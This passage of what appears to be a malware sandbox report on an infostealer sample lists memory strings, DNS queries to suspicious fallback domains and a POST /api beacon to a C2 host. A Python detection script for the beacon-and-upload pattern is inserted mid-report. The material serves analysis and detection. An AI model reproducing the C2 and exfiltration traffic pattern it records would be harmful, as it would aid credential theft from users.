                Source: alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: .net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                Source: alexshlu.exe, 00000003.00000003.1754749506.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1774485750.0000000000CA3000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000002.1775631412.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: BVsteamstatic.lev-tolstoi.comlev-tolstoi.comsets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized equals www.youtube.com (Youtube)
                Source: alexshlu.exe, 00000003.00000003.1476674345.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425694301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized equals www.youtube.com (Youtube)
                Source: alexshlu.exe, 00000003.00000003.1425694301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=8a0582c0d1571303a7d0d81f; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35121Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveWed, 18 Dec 2024 11:08:05 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
                Source: alexshlu.exe, 00000003.00000003.1425694301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                Source: alexshlu.exe, 00000003.00000003.1476674345.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.comHI2 equals www.youtube.com (Youtube)
                Source: alexshlu.exe, 00000003.00000003.1754749506.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1774485750.0000000000CA3000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000002.1775631412.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: sets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized equals www.youtube.com (Youtube)
                Source: global traffic | DNS traffic detected: DNS query: drive-connect.cyou
                Source: global traffic | DNS traffic detected: DNS query: se-blurry.biz
                Source: global traffic | DNS traffic detected: DNS query: zinc-sneark.biz
                Source: global traffic | DNS traffic detected: DNS query: dwell-exclaim.biz
                Source: global traffic | DNS traffic detected: DNS query: formy-spill.biz
                Source: global traffic | DNS traffic detected: DNS query: covery-mover.biz
                Source: global traffic | DNS traffic detected: DNS query: dare-curbys.biz
                Source: global traffic | DNS traffic detected: DNS query: print-vexer.biz
                Source: global traffic | DNS traffic detected: DNS query: impend-differ.biz
                Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
                Source: global traffic | DNS traffic detected: DNS query: lev-tolstoi.com
                Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: lev-tolstoi.com
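Taken together, the HTTP and DNS events above form a sequence a detection engineer can key on: a sweep of DNS queries for the .biz fallback names, a GET for a Steam community profile, then repeated POST /api requests to lev-tolstoi.com under one fixed Chrome/119 User-Agent, opening with tiny application/x-www-form-urlencoded bodies (8, 50 and 85 bytes) and followed by multipart/form-data uploads of up to 582063 bytes. The Python below is an added example, not part of the Joe Sandbox report: it runs those three checks over Zeek-like HTTP and DNS records. The record layout, the thresholds (128-byte handshake cap, 10-second DNS window, 5 distinct .biz names, 60-second Steam-to-POST window) and the sample timestamps are assumptions; hostnames, multipart boundaries and body sizes are copied from the report lines.

```python
"""Heuristics for the C2 traffic sequence listed in the report above.

Added example, not part of the Joe Sandbox report. Records use a Zeek-like
field subset; the sample records at the bottom are constructed for this
example, with hostnames and request sizes copied from the report lines.
"""
from collections import defaultdict
from dataclasses import dataclass

# The single User-Agent string used on every request in the report.
LUMMA_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
            "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36")


@dataclass(frozen=True)
class HttpRec:
    ts: float
    host: str
    method: str
    uri: str
    user_agent: str
    content_type: str
    request_body_len: int


def detect_c2_beacon(records, max_handshake_len=128, min_uploads=2):
    """Per host: small urlencoded POST /api (registration) followed by at least
    min_uploads multipart/form-data POST /api (exfil), all under the fixed UA.
    Returns {host: {"handshakes": n, "uploads": n, "bytes_out": n}} for hits."""
    stats = defaultdict(lambda: {"handshakes": 0, "uploads": 0, "bytes_out": 0})
    for r in sorted(records, key=lambda r: r.ts):
        if (r.method, r.uri, r.user_agent) != ("POST", "/api", LUMMA_UA):
            continue
        s, ctype = stats[r.host], r.content_type.lower()
        if ctype.startswith("application/x-www-form-urlencoded") and r.request_body_len <= max_handshake_len:
            s["handshakes"] += 1
        elif ctype.startswith("multipart/form-data") and s["handshakes"]:
            s["uploads"] += 1                 # only count uploads after a handshake
            s["bytes_out"] += r.request_body_len
    return {h: s for h, s in stats.items() if s["uploads"] >= min_uploads}


def detect_dns_burst(queries, window_s=10.0, min_names=5, suffix=".biz"):
    """First window_s-second window holding >= min_names distinct *suffix names
    (the fallback-domain sweep). queries: iterable of (ts, qname).
    Returns [] or [(window_start_ts, sorted_names)]."""
    q = sorted((ts, n.lower().rstrip(".")) for ts, n in queries
               if n.lower().rstrip(".").endswith(suffix))
    for i, (start, _) in enumerate(q):
        names = {n for ts, n in q[i:] if ts - start <= window_s}
        if len(names) >= min_names:
            return [(start, sorted(names))]
    return []


def detect_steam_precursor(records, beacon_hosts, window_s=60.0):
    """GET steamcommunity.com/profiles/<id> within window_s before the first POST
    to a flagged host, i.e. the ordering seen in the report. Returns (uri, host)."""
    recs = sorted(records, key=lambda r: r.ts)
    first_post = {}
    for r in recs:
        if r.method == "POST" and r.host in beacon_hosts:
            first_post.setdefault(r.host, r.ts)
    return [(r.uri, h) for r in recs
            if r.method == "GET" and r.host == "steamcommunity.com" and r.uri.startswith("/profiles/")
            for h, t0 in first_post.items() if 0 <= t0 - r.ts <= window_s]


# Constructed sample: timestamps invented; shapes and sizes taken from the report.
_C2, _URLENC = "lev-tolstoi.com", "application/x-www-form-urlencoded"
SAMPLE_HTTP = [
    HttpRec(10.0, "steamcommunity.com", "GET", "/profiles/76561199724331900", LUMMA_UA, "", 0),
    HttpRec(11.0, _C2, "POST", "/api", LUMMA_UA, _URLENC, 8),
    HttpRec(12.0, _C2, "POST", "/api", LUMMA_UA, _URLENC, 50),
    HttpRec(13.0, _C2, "POST", "/api", LUMMA_UA, "multipart/form-data; boundary=N08MCDNNF0PK0HU2Z", 12843),
    HttpRec(14.0, _C2, "POST", "/api", LUMMA_UA, "multipart/form-data; boundary=UZISBZQ0QWSQV5", 15054),
    HttpRec(15.0, _C2, "POST", "/api", LUMMA_UA, "multipart/form-data; boundary=DBZLQE7OO4ZHJHDX", 20233),
    HttpRec(16.0, _C2, "POST", "/api", LUMMA_UA, "multipart/form-data; boundary=XRK0RM6J3", 1171),
    HttpRec(17.0, _C2, "POST", "/api", LUMMA_UA, "multipart/form-data; boundary=2CZLVT98GDNSWI", 582063),
    HttpRec(18.0, _C2, "POST", "/api", LUMMA_UA, _URLENC, 85),
    # Noise: the Chrome 119 UA is a real browser UA, so a JSON POST /api elsewhere must not match.
    HttpRec(19.0, "api.example.net", "POST", "/api", LUMMA_UA, "application/json", 40),
]
SAMPLE_DNS = [(float(i), n) for i, n in enumerate([
    "drive-connect.cyou", "se-blurry.biz", "zinc-sneark.biz", "dwell-exclaim.biz",
    "formy-spill.biz", "covery-mover.biz", "dare-curbys.biz", "print-vexer.biz",
    "impend-differ.biz", "steamcommunity.com", "lev-tolstoi.com"])]

if __name__ == "__main__":
    beacons = detect_c2_beacon(SAMPLE_HTTP)
    print("C2 beacon hosts:", beacons)
    print("fallback DNS burst:", detect_dns_burst(SAMPLE_DNS))
    print("Steam precursor:", detect_steam_precursor(SAMPLE_HTTP, beacons))
```

Run directly, it prints the three findings for the constructed sample: lev-tolstoi.com with 3 handshakes, 5 uploads and 631364 bytes out, a burst of 8 .biz names, and the profile GET one second before the first beacon. The beacon check deliberately ignores the User-Agent on its own, since Chrome/119 is a legitimate browser string; it is the combination of path, tiny urlencoded handshake and subsequent multipart uploads to the same host that is distinctive. The Steam check records ordering only: the report shows the C2 hostname inside the Steam page content recovered from memory (the `steamstatic.lev-tolstoi.com` fragment), which is why the profile fetch is worth correlating, but this example does not parse that page.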
                Source: alexshlu.exe, 00000003.00000003.1425694301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                Source: alexshlu.exe, 00000003.00000003.1608240091.0000000003501000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: alexshlu.exe, 00000003.00000003.1608240091.0000000003501000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: alexshlu.exe, 00000003.00000003.1608240091.0000000003501000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: alexshlu.exe, 00000003.00000003.1608240091.0000000003501000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: alexshlu.exe, 00000003.00000003.1608240091.0000000003501000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: alexshlu.exe, 00000003.00000003.1608240091.0000000003501000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: alexshlu.exe, 00000003.00000003.1608240091.0000000003501000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: alexshlu.exe, 00000003.00000003.1608240091.0000000003501000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: alexshlu.exe, 00000003.00000003.1608240091.0000000003501000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1528531670.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1528531670.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1528531670.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
                Source: alexshlu.exe, 00000003.00000003.1608240091.0000000003501000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: alexshlu.exe, 00000003.00000003.1608240091.0000000003501000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: alexshlu.exe, 00000003.00000003.1529377207.0000000003528000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529199963.000000000352B000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529270353.0000000003528000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                Source: alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                Source: alexshlu.exe, 00000003.00000003.1425694301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                Source: alexshlu.exe, 00000003.00000003.1529377207.0000000003528000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529199963.000000000352B000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529270353.0000000003528000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
                Source: alexshlu.exe, 00000003.00000003.1529377207.0000000003528000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529199963.000000000352B000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529270353.0000000003528000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: alexshlu.exe, 00000003.00000003.1529377207.0000000003528000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529199963.000000000352B000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529270353.0000000003528000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                Source: alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
                Source: alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425694301.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1528531670.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425694301.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425694301.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=THDq-gsQ
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425694301.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=0Xxx
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
